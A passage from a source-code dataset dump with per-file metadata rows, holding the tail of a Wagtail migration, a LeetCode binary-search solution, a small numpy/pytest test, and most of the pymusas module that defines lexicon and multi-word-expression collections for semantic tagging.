wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Map HTML'))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
migrations.CreateModel(
name='PersonPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.wagtailcore.fields.StreamField([(b'h2', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h3', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h4', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h5', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'pullquote', wagtail.wagtailcore.blocks.StructBlock([(b'quote', wagtail.wagtailcore.blocks.TextBlock('quote title')), (b'attribution', wagtail.wagtailcore.blocks.CharBlock())])), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'image', wagtail.wagtailimages.blocks.ImageChooserBlock()), (b'caption', wagtail.wagtailcore.blocks.RichTextBlock()), (b'alignment', cms.models.streamfield.ImageFormatChoiceBlock())], icon='image', label='Aligned image')), (b'document', wagtail.wagtaildocs.blocks.DocumentChooserBlock(icon='doc-full-inverse')), (b'page', wagtail.wagtailcore.blocks.StructBlock([(b'page', wagtail.wagtailcore.blocks.PageChooserBlock()), (b'label', wagtail.wagtailcore.blocks.CharBlock())], icon='link')), (b'embed', wagtail.wagtailembeds.blocks.EmbedBlock(icon='media')), (b'html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), (b'map_html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Map HTML'))])),
('first_name', models.CharField(max_length=256)),
('last_name', models.CharField(max_length=256)),
('intro', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
]
| [
"[email protected]"
] | |
704da8e2d99a67413d641ece944fa1a4042d6e8e | 07f33106eeda3dff104105250fb5d299938bff6b | /数组/1552_两球之间的磁力.py | c25e73b1afbf4e08ff3f0127684b147103fef6d8 | [] | no_license | fadeawaylove/leetcode_practice | 5e40c3bcf8f7721bc1a843b7ac820041eae5c89b | 74809f13f43e74a19f5a9f8d908cfe6a9ec774b2 | refs/heads/master | 2023-01-02T05:35:57.529975 | 2020-10-28T06:03:59 | 2020-10-28T06:03:59 | 267,814,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | """
在代号为 C-137 的地球上,Rick 发现如果他将两个球放在他新发明的篮子里,它们之间会形成特殊形式的磁力。Rick 有 n 个空的篮子,第 i 个篮子的位置在 position[i] ,Morty 想把 m 个球放到这些篮子里,使得任意两球间 最小磁力 最大。
已知两个球如果分别位于 x 和 y ,那么它们之间的磁力为 |x - y| 。
给你一个整数数组 position 和一个整数 m ,请你返回最大化的最小磁力。
示例 1:
输入:position = [1,2,3,4,7], m = 3
输出:3
解释:将 3 个球分别放入位于 1,4 和 7 的三个篮子,两球间的磁力分别为 [3, 3, 6]。最小磁力为 3 。我们没办法让最小磁力大于 3 。
示例 2:
输入:position = [5,4,3,2,1,1000000000], m = 2
输出:999999999
解释:我们使用位于 1 和 1000000000 的篮子时最小磁力最大。
提示:
n == position.length
2 <= n <= 10^5
1 <= position[i] <= 10^9
所有 position 中的整数 互不相同 。
2 <= m <= position.length
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/magnetic-force-between-two-balls
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
from typing import List
class Solution:
def maxDistance(self, position: List[int], m: int) -> int:
def check(g, pos):
cur = pos[0]
cnt = 1
for p in pos[1:]:
if p - cur >= g:
cnt += 1
cur = p
if cnt >= m:
return True
return False
position = sorted(position)
n = len(position)
# 预测的最大间隔
max_gap = (position[-1] - position[0]) // (m - 1)
min_gap = 1
for i in range(n - 1):
min_gap = min(min_gap, position[i + 1] - position[i])
start = min_gap
stop = max_gap
while stop >= start:
gap = (start + stop) // 2
ret = check(gap, position)
print(ret, start, stop, gap)
if ret: # 检查成功,可以适当扩大gap
start = gap + 1
else: # 检查失败,缩小gap
stop = gap - 1
return start - 1
print(Solution().maxDistance([1, 2, 3, 4, 7], m=3))
# print(Solution().maxDistance([5, 4, 3, 2, 1, 1000000000], m=2))
# print(Solution().maxDistance([79, 74, 57, 22], m=4))
| [
"[email protected]"
] | |
e8ec0cd093e9e24840ac391ba6873cc50d9f170a | 6b1b506139088aa30de9fd65cff9e3b6a3a36874 | /sofia_redux/toolkit/fitting/tests/test_polynomial/test_linear_vector_lstsq.py | 6e23b6f9ff2c919be37c0f4bf09177809de894cd | [
"BSD-3-Clause"
] | permissive | SOFIA-USRA/sofia_redux | df2e6ad402b50eb014b574ea561734334d70f84d | 493700340cd34d5f319af6f3a562a82135bb30dd | refs/heads/main | 2023-08-17T11:11:50.559987 | 2023-08-13T19:52:37 | 2023-08-13T19:52:37 | 311,773,000 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from sofia_redux.toolkit.fitting.polynomial \
import linear_equation, linear_vector_lstsq
@pytest.fixture
def data():
a = np.array([[3, 4], [5, 6.]])
b = np.array([[7., 8]])
alpha, beta = linear_equation(a, b)
return alpha, beta
def test_expected(data):
alpha, beta = data
result = linear_vector_lstsq(alpha, beta, np.array([[3.5, 4.5]]).T)
assert np.allclose(result, 5.5)
assert result.shape == (1, 1)
| [
"[email protected]"
] | |
9103b175f0dc0def46401425ba1ea74119a80dcb | 890b089c87b247cb06613530277c04d0eb6e3e91 | /pymusas/lexicon_collection.py | 40445856b05d88a2044eb708ad59c91127daff47 | [
"Apache-2.0"
] | permissive | UCREL/pymusas | e5978a400f1bbe783dbda5c736fce2dd546f0416 | 2afc3e919f0ffb1de42fda169c18fa757db0307a | refs/heads/main | 2023-09-03T15:52:38.396275 | 2023-08-17T22:34:46 | 2023-08-17T22:34:46 | 405,042,010 | 22 | 8 | Apache-2.0 | 2023-05-10T13:15:59 | 2021-09-10T10:26:50 | Python | UTF-8 | Python | false | false | 44,306 | py | import collections
from collections.abc import MutableMapping
import csv
from dataclasses import dataclass
from enum import Enum, unique
from os import PathLike
import re
import typing
from typing import DefaultDict, Dict, Generator, List, Optional, Set, Tuple, Union, cast
from urllib.parse import urlparse
import warnings
import srsly
from . import file_utils, utils
@unique
class LexiconType(str, Enum):
'''
Descriptions of the type associated to single and Multi Word Expression (MWE)
lexicon entires and templates. Any type with the word `NON_SPECIAL` means
that it does not use any special syntax, for example does not use wildcards
or curly braces.
The `value` attribute of each instance attribute is of type `str` describing
the type associated with that attribute. For the best explanation see the
example below.
# Instance Attributes
SINGLE_NON_SPECIAL : `LexiconType`
Single word lexicon lookup.
MWE_NON_SPECIAL : `LexiconType`
MWE lexicon lookup.
MWE_WILDCARD : `LexiconType`
MWE lexicon lookup using a wildcard.
MWE_CURLY_BRACES : `LexiconType`
MWE lexicon lookup using curly braces.
# Examples
```python
>>> from pymusas.lexicon_collection import LexiconType
>>> assert 'Single Non Special' == LexiconType.SINGLE_NON_SPECIAL
>>> assert 'Single Non Special' == LexiconType.SINGLE_NON_SPECIAL.value
>>> assert 'SINGLE_NON_SPECIAL' == LexiconType.SINGLE_NON_SPECIAL.name
>>> all_possible_values = {'Single Non Special', 'MWE Non Special',
... 'MWE Wildcard', 'MWE Curly Braces'}
>>> assert all_possible_values == {lexicon_type.value for lexicon_type in LexiconType}
```
'''
SINGLE_NON_SPECIAL = 'Single Non Special'
MWE_NON_SPECIAL = 'MWE Non Special'
MWE_WILDCARD = 'MWE Wildcard'
MWE_CURLY_BRACES = 'MWE Curly Braces'
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return self.__str__()
@dataclass(init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=True)
class LexiconEntry:
'''
A LexiconEntry contains the `semantic_tags` that are associated with a
`lemma` and optionally the lemma's `POS`.
As frozen is true, the attributes cannot be assigned another value.
This data type is mainly used for single word lexicons, rather than
Multi Word Expression (MWE).
**Note** the parameters to the `__init__` are the same as the Instance
Attributes.
# Instance Attributes
lemma: `str`
The lemma of a token or the token itself.
semantic_tags: `List[str]`
The semantic tags associated with the `lemma` and optional `POS`.
The semantic tags are in rank order, the most likely tag
is the first tag in the list.
pos: `str`, optional (default = `None`)
The Part Of Speech (POS) to be associated with the `lemma`.
'''
lemma: str
semantic_tags: List[str]
pos: Optional[str] = None
@dataclass(init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=True)
class LexiconMetaData:
'''
A LexiconMetaData object contains all of the meta data about a given
single word or Multi Word Expression (MWE) lexicon entry. This meta data can
be used to help rank single and MWE entries when tagging.
As frozen is true, the attributes cannot be assigned another value.
**Note** the parameters to the `__init__` are the same as the Instance
Attributes.
# Instance Attributes
semantic_tags : `List[str]`
The semantic tags associated with the lexicon entry.
The semantic tags are in rank order, the most likely tag
is the first tag in the list.
n_gram_length : `int`
The n-gram size of the lexicon entry, e.g. `*_noun boot*_noun` will be
of length 2 and all single word lexicon entries will be of length 1.
lexicon_type : `LexiconType`
Type associated to the lexicon entry.
wildcard_count : `int`
Number of wildcards in the lexicon entry, e.g. `*_noun boot*_noun` will
be 2 and `ski_noun boot_noun` will be 0.
'''
semantic_tags: List[str]
n_gram_length: int
lexicon_type: LexiconType
wildcard_count: int
class LexiconCollection(MutableMapping):
'''
This is a dictionary object that will hold :class:`LexiconEntry` data in a fast to
access object. The keys of the dictionary are expected to be either just a
lemma or a combination of lemma and pos in the following format:
`{lemma}|{pos}` e.g. `Car|Noun`.
The value to each key is the associated semantic tags, whereby the semantic
tags are in rank order, the most likely tag is the first tag in the list.
**Note** that the `lemma` can be the token
itself rather than just it's base form, e.g. can be `Cars` rather than `Car`.
This data type is used for single word lexicons, to store Multi Word
Expression (MWE) see the :class:`MWELexiconCollection`.
# Parameters
data: `Dict[str, List[str]]`, optional (default = `None`)
# Instance Attributes
data: `Dict[str, List[str]]`
Dictionary where the keys are `{lemma}|{pos}` and the values are
a list of associated semantic tags. If the `data` parameter given was
`None` then the value of this attribute will be an empty dictionary.
# Examples
``` python
>>> from pymusas.lexicon_collection import LexiconEntry, LexiconCollection
>>> lexicon_entry = LexiconEntry('London', ['Z3', 'Z1', 'A1'], 'noun')
>>> collection = LexiconCollection()
>>> collection.add_lexicon_entry(lexicon_entry)
>>> most_likely_tag = collection['London|noun'][0]
>>> assert most_likely_tag == 'Z3'
>>> least_likely_tag = collection['London|noun'][-1]
>>> assert least_likely_tag == 'A1'
```
'''
def __init__(self, data: Optional[Dict[str, List[str]]] = None) -> None:
self.data: Dict[str, List[str]] = {}
if data is not None:
self.data = data
def add_lexicon_entry(self, value: LexiconEntry,
include_pos: bool = True) -> None:
'''
Will add the :class:`LexiconEntry` to the collection, whereby the key is the
combination of the lemma and pos and the value are the semantic tags.
The lemma and pos are combined as follows: `{lemma}|{pos}`, e.g.
`Car|Noun`
If the pos value is None then then only the lemma is used: `{lemma}`,
e.g. `Car`
# Parameters
value: `LexiconEntry`
Lexicon Entry to add to the collection.
include_pos: `bool`, optional (default = `True`)
Whether to include the POS tag within the key.
'''
lemma = value.lemma
if value.pos is not None and include_pos:
lemma += f'|{value.pos}'
self[lemma] = value.semantic_tags
def to_dictionary(self) -> Dict[str, List[str]]:
'''
Returns the `data` instance attribute.
# Returns
`Dict[str, List[str]]`
'''
return self.data
def to_bytes(self) -> bytes:
'''
Serialises the :class:`LexiconCollection` to a bytestring.
# Returns
`bytes`
'''
return cast(bytes, srsly.msgpack_dumps(self.data))
@staticmethod
def from_bytes(bytes_data: bytes) -> "LexiconCollection":
'''
Loads :class:`LexiconCollection` from the given bytestring and
returns it.
# Parameters
bytes_data : `bytes`
The bytestring to load.
# Returns
:class:`LexiconCollection`
'''
return LexiconCollection(srsly.msgpack_loads(bytes_data))
@staticmethod
def from_tsv(tsv_file_path: Union[PathLike, str], include_pos: bool = True
) -> Dict[str, List[str]]:
'''
Given a `tsv_file_path` it will return a dictionary object that can
be used to create a :class:`LexiconCollection`.
Each line in the TSV file will be read in as a :class:`LexiconEntry`
and added to a temporary :class:`LexiconCollection`, once all lines
in the TSV have been parsed the return value is the `data` attribute of
the temporary :class:`LexiconCollection`.
If the file path is a URL, the file will be downloaded and cached using
:func:`pymusas.file_utils.download_url_file`.
If `include_pos` is True and the TSV file does not contain a
`pos` field heading then this will return a LexiconCollection that is
identical to a collection that ran this method with `include_pos` equal
to False.
Code reference, the identification of a URL and the idea to do this has
come from the [AllenNLP library](https://github.com/allenai/allennlp/blob/main/allennlp/common/file_utils.py#L205)
# Parameters
tsv_file_path: `Union[PathLike, str]`
A file path or URL to a TSV file that contains at least two
fields, with an optional third, with the following headings:
1. `lemma`,
2. `semantic_tags`
3. `pos` (Optional)
All other fields will be ignored.
include_pos: `bool`, optional (default = `True`)
Whether to include the POS information, if the information is avaliable,
or not. See :func:`add_lexicon_entry` for more information on this
parameter.
# Returns
`Dict[str, List[str]]`
# Raises
`ValueError`
If the minimum field headings, `lemma` and `semantic_tags`, do not
exist in the given TSV file.
# Examples
`include_pos` = `True`
``` python
>>> from pymusas.lexicon_collection import LexiconCollection
>>> welsh_lexicon_url = 'https://raw.githubusercontent.com/apmoore1/Multilingual-USAS/master/Welsh/semantic_lexicon_cy.tsv'
>>> welsh_lexicon_dict = LexiconCollection.from_tsv(welsh_lexicon_url, include_pos=True)
>>> welsh_lexicon_collection = LexiconCollection(welsh_lexicon_dict)
>>> assert welsh_lexicon_dict['ceir|noun'][0] == 'M3fn'
>>> assert welsh_lexicon_dict['ceir|verb'][0] == 'A9+'
```
`include_pos` = `False`
``` python
>>> from pymusas.lexicon_collection import LexiconCollection
>>> welsh_lexicon_url = 'https://raw.githubusercontent.com/apmoore1/Multilingual-USAS/master/Welsh/semantic_lexicon_cy.tsv'
>>> welsh_lexicon_dict = LexiconCollection.from_tsv(welsh_lexicon_url, include_pos=False)
>>> welsh_lexicon_collection = LexiconCollection(welsh_lexicon_dict)
>>> assert welsh_lexicon_dict['ceir'][0] == 'M3fn'
```
'''
minimum_field_names = {'lemma', 'semantic_tags'}
extra_field_names = ['pos']
field_names_to_extract = []
collection_from_tsv = LexiconCollection()
if not isinstance(tsv_file_path, str):
tsv_file_path = str(tsv_file_path)
parsed = urlparse(tsv_file_path)
if parsed.scheme in ("http", "https", "s3", "hf", "gs"):
tsv_file_path = file_utils.download_url_file(tsv_file_path)
with open(tsv_file_path, 'r', newline='', encoding='utf-8') as fp:
csv_reader = csv.DictReader(fp, delimiter='\t')
file_field_names: Set[str] = set()
if csv_reader.fieldnames:
file_field_names = set(csv_reader.fieldnames)
if minimum_field_names.issubset(file_field_names):
field_names_to_extract.extend(list(minimum_field_names))
else:
error_msg = ("The TSV file given should contain a header that"
" has at minimum the following fields "
f"{minimum_field_names}. The field names found "
f"were {file_field_names}")
raise ValueError(error_msg)
for extra_field_name in extra_field_names:
if extra_field_name in file_field_names:
field_names_to_extract.append(extra_field_name)
for row in csv_reader:
row_data: typing.MutableMapping[str, Union[str, List[str]]] = {}
for field_name in field_names_to_extract:
if field_name == 'semantic_tags':
row_data[field_name] = row[field_name].split()
else:
row_data[field_name] = row[field_name]
collection_from_tsv.add_lexicon_entry(LexiconEntry(**row_data),
include_pos=include_pos)
return collection_from_tsv.to_dictionary()
def __setitem__(self, key: str, value: List[str]) -> None:
self.data[key] = value
def __getitem__(self, key: str) -> List[str]:
return self.data[key]
def __delitem__(self, key: str) -> None:
del self.data[key]
def __len__(self) -> int:
return len(self.data)
def __iter__(self) -> Generator[str, None, None]:
for key in self.data:
yield key
def __str__(self) -> str:
'''
Human readable string.
'''
object_str = 'LexiconCollection('
for index, item in enumerate(self.items()):
object_str += f"('{item[0]}': {item[1]}), "
if index == 1:
object_str += '... '
break
object_str += f') ({len(self)} entires in the collection)'
return object_str
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return f'{self.__class__.__name__}(data={self.data})'
def __eq__(self, other: object) -> bool:
'''
Given another object to compare too it will return `True` if the other
object is the same class and contains the same `data` instance attribute.
# Parameters
other : `object`
The object to compare too.
# Returns
`True`
'''
if not isinstance(other, LexiconCollection):
return False
if len(self) != len(other):
return False
if self.data != other.data:
return False
return True
class MWELexiconCollection(MutableMapping):
r'''
A collection that stores Multi Word Expression (MWE) templates and their
associated meta data.
This collection allows users to:
1. Easily load MWE templates from a single TSV file.
2. Find strings that match MWE templates taking into account
any special syntax rules that should be applied, e.g. wildcards allow zero
or more characters to appear after the word token and/or Part Of Speech (POS) tag.
For more information on the MWE special syntax rules see the following
[notes](/usage/notes/mwe_syntax).
3. POS mapping, it can find strings that match MWE templates while taking
into account mapping from one POS tagset to another in both a one to one and
one to many mapping.
**Note** that even though this a sub-class of a MutableMapping it has a
time complexity of O(n) for deletion unlike the standard Python MutableMapping,
see the [following dict time complexities](https://wiki.python.org/moin/TimeComplexity),
this is due to keeping track of the `longest_non_special_mwe_template` and
`longest_wildcard_mwe_template`.
As we do not currently support curly braces MWE template syntax, therefore
any MWE templates that contain a `{` or `}` will be ignored and will not be
added to this collection, in addition a `UserWarning` will be raised stating
this.
# Parameters
data: `Dict[str, List[str]]`, optional (default = `None`)
Dictionary where the keys are MWE templates, of any :class:`LexiconType`,
and the values are a list of associated semantic tags.
pos_mapper : `Dict[str, List[str]]`, optional (default = `None`)
If not `None`, maps from the lexicon's POS tagset to the desired
POS tagset, whereby the mapping is a `List` of tags, at the moment there
is no preference order in this list of POS tags. The POS mapping is
useful in situtation whereby the leixcon's POS tagset is different to
the token's. **Note** that the longer the `List[str]` for each POS
mapping the longer it will take to match MWE templates. A one to one
mapping will have no speed impact on the tagger. A selection of POS
mappers can be found in :mod:`pymusas.pos_mapper`.
# Instance Attributes
**Note** if the `data` parameter given was `None` then the value of all
dictionary attributes will be an empty dictionary and all integer values will
be `0`. If `pos_mapper` parameter was `None` then the `pos_mapper` attribute
will be an empty dictionary.
meta_data: `Dict[str, LexiconMetaData]`
Dictionary where the keys are MWE templates, of any type, and the values
are their associated meta data stored in a :class:`LexiconMetaData` object.
longest_non_special_mwe_template : `int`
The longest MWE template with no special symbols measured by n-gram size.
For example the MWE template `ski_noun boot_noun` will be of length 2.
longest_wildcard_mwe_template : `int`
The longest MWE template with at least one wildcard (`*`) measured by n-gram size.
For example the MWE template `*_noun boot*_noun` will be of length 2.
longest_mwe_template : `int`
The longest MWE template regardless of type measured by n-gram size.
most_wildcards_in_mwe_template : `int`
The number of wildcards in the MWE template that contains the
most wildcards, e.g. the MWE template `ski_* *_noun` would contain 2
wildcards. This can be 0 if you have no wildcard MWE templates.
mwe_regular_expression_lookup: `Dict[int, Dict[str, Dict[str, re.Pattern]]]`
A dictionary that can lookup all special syntax MWE templates there
regular expression pattern. These templates are found first by
their n-gram length and then their first character symbol. The regular
expression pattern is used for quick matching within the :func:`mwe_match`.
From the special syntax only wildcard (`*`) symbols are supported at the
moment.
pos_mapper : `Dict[str, List[str]]`
The given `pos_mapper`.
one_to_many_pos_tags : `Set[str]`
A set of POS tags that have a one to many mapping, this is created based
on the `pos_mapper`. This is empty if `pos_mapper` is `None`
pos_mapping_lookup : `Dict[str, str]`
Only used if `pos_mapper` is not `None`. For all one-to-one POS mappings
will store the mapped POS MWE template as keys and the original non-mapped
(original) MWE templates as values, which can be used to lookup the meta
data from `meta_data`.
pos_mapping_regular_expression_lookup : `Dict[LexiconType, Dict[int, Dict[str, Dict[str, re.Pattern]]]]`
Only used if `pos_mapper` is not `None` and will result in
`mwe_regular_expression_lookup` being empty as it replaces it
functionality and extends it and by handlining the one-to-many POS
mapping cases. When we have a one-to-many POS mapping case this requires
a regular expression mapping even for non special syntax MWE templates.
Compared to the `mwe_regular_expression_lookup` the first set of keys
represent the lexicon entry match type.
# Examples
``` python
>>> import re
>>> from pymusas.lexicon_collection import MWELexiconCollection, LexiconType
>>> mwe_collection = MWELexiconCollection()
>>> mwe_collection['*_noun boot*_noun'] = ['Z0', 'Z3']
>>> meta_data = mwe_collection['*_noun boot*_noun']
>>> assert 2 == meta_data.n_gram_length
>>> assert LexiconType.MWE_WILDCARD == meta_data.lexicon_type
>>> assert 2 == meta_data.wildcard_count
>>> most_likely_tag = meta_data.semantic_tags[0]
>>> assert most_likely_tag == 'Z0'
>>> least_likely_tag = meta_data.semantic_tags[-1]
>>> assert least_likely_tag == 'Z3'
>>> # change defaultdict to dict so the dictionary is easier to read and understand
>>> assert ({k: dict(v) for k, v in mwe_collection.mwe_regular_expression_lookup.items()}
... == {2: {'*': {'*_noun boot*_noun': re.compile('[^\\s_]*_noun\\ boot[^\\s_]*_noun')}}})
```
'''
def __init__(self, data: Optional[Dict[str, List[str]]] = None,
pos_mapper: Optional[Dict[str, List[str]]] = None) -> None:
self.meta_data: Dict[str, LexiconMetaData] = {}
self.longest_non_special_mwe_template = 0
self.longest_wildcard_mwe_template = 0
self.longest_mwe_template = 0
self.most_wildcards_in_mwe_template = 0
self.mwe_regular_expression_lookup: DefaultDict[int, DefaultDict[str, Dict[str, re.Pattern]]]\
= collections.defaultdict(lambda: collections.defaultdict(dict))
self.pos_mapper: Dict[str, List[str]] = {}
self.one_to_many_pos_tags: Set[str] = set()
self.pos_mapping_lookup: Dict[str, str] = {}
self.pos_mapping_regular_expression_lookup: DefaultDict[LexiconType, DefaultDict[int, DefaultDict[str, Dict[str, re.Pattern]]]]\
= collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(dict)))
if pos_mapper is not None:
self.pos_mapper = pos_mapper
for from_pos, to_pos in pos_mapper.items():
if len(to_pos) > 1:
self.one_to_many_pos_tags.add(from_pos)
if data is not None:
for key, value in data.items():
self[key] = value
def mwe_match(self, mwe_template: str, mwe_type: LexiconType
) -> List[str]:
'''
Returns a `List` of MWE templates, with the given `mwe_type`, that match
the given `mwe_template`. If there are no matches the returned `List`
will be empty.
This method applies all of the special syntax rules that should be applied
e.g. wildcards allow zero or more characters to appear after the word
token and/or Part Of Speech (POS) tag. For more information on the MWE
special syntax rules see the following [notes](/usage/notes/mwe_syntax).
# Parameters
mwe_template : `str`
The MWE template that you want to match against, e.g.
`river_noun bank_noun` or `ski_noun boots_noun`
mwe_type : `LexiconType`
The type of MWE templates that you want to return.
# Returns
`Optional[List[str]]`
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection, LexiconType
>>> collection = MWELexiconCollection({'walking_noun boot_noun': ['Z2'], 'ski_noun boot_noun': ['Z2'], '*_noun boot_noun': ['Z2'], '*_noun *_noun': ['Z2']})
>>> assert [] == collection.mwe_match('river_noun bank_noun', LexiconType.MWE_NON_SPECIAL)
>>> assert ['walking_noun boot_noun'] == collection.mwe_match('walking_noun boot_noun', LexiconType.MWE_NON_SPECIAL)
>>> assert ['*_noun boot_noun', '*_noun *_noun'] == collection.mwe_match('walking_noun boot_noun', LexiconType.MWE_WILDCARD)
```
'''
mwe_templates_matches: List[str] = []
if self.pos_mapper:
if mwe_type == LexiconType.MWE_NON_SPECIAL:
mwe_mapped_template = self.pos_mapping_lookup.get(mwe_template, None)
if mwe_mapped_template is not None:
potential_match = self.meta_data.get(mwe_mapped_template, None)
if potential_match is not None:
potential_match_type = potential_match.lexicon_type
if LexiconType.MWE_NON_SPECIAL == potential_match_type:
mwe_templates_matches.append(mwe_mapped_template)
requires_regular_expression_matching = False
if mwe_type == LexiconType.MWE_WILDCARD:
requires_regular_expression_matching = True
if not mwe_templates_matches and self.one_to_many_pos_tags:
requires_regular_expression_matching = True
if requires_regular_expression_matching:
n_gram_length = len(mwe_template.split())
mwe_template_length = len(mwe_template)
if mwe_template_length > 0:
for character_lookup in ['*', mwe_template[0]]:
regular_expression_lookup = self.pos_mapping_regular_expression_lookup[mwe_type][n_gram_length]
if character_lookup not in regular_expression_lookup:
continue
for (potential_mwe_match,
mwe_pattern) in regular_expression_lookup[character_lookup].items():
match = mwe_pattern.match(mwe_template)
if match is not None:
if (match.start() == 0
and match.end() == mwe_template_length):
mwe_templates_matches.append(potential_mwe_match)
else:
if mwe_type == LexiconType.MWE_NON_SPECIAL:
potential_match = self.meta_data.get(mwe_template, None)
if potential_match is not None:
potential_match_type = potential_match.lexicon_type
if LexiconType.MWE_NON_SPECIAL == potential_match_type:
mwe_templates_matches.append(mwe_template)
elif mwe_type == LexiconType.MWE_WILDCARD:
n_gram_length = len(mwe_template.split())
mwe_template_length = len(mwe_template)
if mwe_template_length > 0:
# By default all MWE matches can start with a * as it covers all characters.
for character_lookup in ['*', mwe_template[0]]:
regular_expression_lookup = self.mwe_regular_expression_lookup[n_gram_length]
if character_lookup not in regular_expression_lookup:
continue
for (potential_mwe_match,
mwe_pattern) in regular_expression_lookup[character_lookup].items():
match = mwe_pattern.match(mwe_template)
if match is not None:
if (match.start() == 0
and match.end() == mwe_template_length):
mwe_templates_matches.append(potential_mwe_match)
return mwe_templates_matches
def to_dictionary(self) -> Dict[str, List[str]]:
'''
Returns a dictionary of all MWE templates, the keys, stored in the
collection and their associated semantic tags, the values.
This can then be used to re-create a :class:`MWELexiconCollection`.
# Returns
`Dict[str, List[str]]`
# Examples
``` python
>>> from pymusas.lexicon_collection import (MWELexiconCollection,
... LexiconType, LexiconMetaData)
>>> mwe_collection = MWELexiconCollection()
>>> mwe_collection['*_noun boot*_noun'] = ['Z0', 'Z3']
>>> assert (mwe_collection['*_noun boot*_noun']
... == LexiconMetaData(['Z0', 'Z3'], 2, LexiconType.MWE_WILDCARD, 2))
>>> assert (mwe_collection.to_dictionary()
... == {'*_noun boot*_noun': ['Z0', 'Z3']})
```
'''
return {key: value.semantic_tags for key, value in self.items()}
def to_bytes(self) -> bytes:
'''
Serialises the :class:`MWELexiconCollection` to a bytestring.
# Returns
`bytes`
'''
serialise = {}
data: Dict[str, List[str]] = {key: value.semantic_tags
for key, value in self.meta_data.items()}
serialise['data'] = srsly.msgpack_dumps(data)
serialise['pos_mapper'] = srsly.msgpack_dumps(self.pos_mapper)
return cast(bytes, srsly.msgpack_dumps(serialise))
@staticmethod
def from_bytes(bytes_data: bytes) -> "MWELexiconCollection":
'''
Loads :class:`MWELexiconCollection` from the given bytestring and
returns it.
# Parameters
bytes_data : `bytes`
The bytestring to load.
# Returns
:class:`MWELexiconCollection`
'''
serialise_data = srsly.msgpack_loads(bytes_data)
data = srsly.msgpack_loads(serialise_data['data'])
pos_mapper = srsly.msgpack_loads(serialise_data['pos_mapper'])
return MWELexiconCollection(data, pos_mapper)
@staticmethod
def from_tsv(tsv_file_path: Union[PathLike, str]
) -> Dict[str, List[str]]:
'''
Given a `tsv_file_path` it will return a dictionary object
that can be used to create a :class:`MWELexiconCollection`.
Each line in the TSV file will be read in and added to a temporary
:class:`MWELexiconCollection`, once all lines
in the TSV have been parsed, the return value is the `data` attribute of
the temporary :class:`MWELexiconCollection`.
If the file path is a URL, the file will be downloaded and cached using
:func:`pymusas.file_utils.download_url_file`.
Code reference, the identification of a URL and the idea to do this has
come from the [AllenNLP library](https://github.com/allenai/allennlp/blob/main/allennlp/common/file_utils.py#L205)
# Parameters
tsv_file_path: `Union[PathLike, str]`
A file path or URL to a TSV file that contains at least these two
fields:
1. `mwe_template`,
2. `semantic_tags`
All other fields will be ignored.
# Returns
`Dict[str, List[str]]`
# Raises
`ValueError`
If the minimum field headings, `mwe_template` and `semantic_tags`,
do not exist in the given TSV file.
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection
>>> portuguese_lexicon_url = 'https://raw.githubusercontent.com/UCREL/Multilingual-USAS/master/Portuguese/mwe-pt.tsv'
>>> mwe_lexicon_dict = MWELexiconCollection.from_tsv(portuguese_lexicon_url)
>>> mwe_lexicon_collection = MWELexiconCollection(mwe_lexicon_dict)
>>> assert mwe_lexicon_dict['abaixo_adv de_prep'][0] == 'M6'
>>> assert mwe_lexicon_dict['arco_noun e_conj flecha_noun'][0] == 'K5.1'
```
'''
minimum_field_names = {'mwe_template', 'semantic_tags'}
collection_from_tsv = MWELexiconCollection()
if not isinstance(tsv_file_path, str):
tsv_file_path = str(tsv_file_path)
parsed = urlparse(tsv_file_path)
if parsed.scheme in ("http", "https", "s3", "hf", "gs"):
tsv_file_path = file_utils.download_url_file(tsv_file_path)
with open(tsv_file_path, 'r', newline='', encoding='utf-8') as fp:
csv_reader = csv.DictReader(fp, delimiter='\t')
file_field_names: Set[str] = set()
if csv_reader.fieldnames:
file_field_names = set(csv_reader.fieldnames)
if not minimum_field_names.issubset(file_field_names):
error_msg = (f"The TSV file, {tsv_file_path}, given should "
"contain a header that"
" has at minimum the following fields "
f"{minimum_field_names}. The field names found "
f"were {file_field_names}")
raise ValueError(error_msg)
for row in csv_reader:
mwe_template = ''
semantic_tags: List[str] = []
for field_name in minimum_field_names:
if field_name == 'semantic_tags':
semantic_tags = row[field_name].split()
elif field_name == 'mwe_template':
mwe_template = row[field_name]
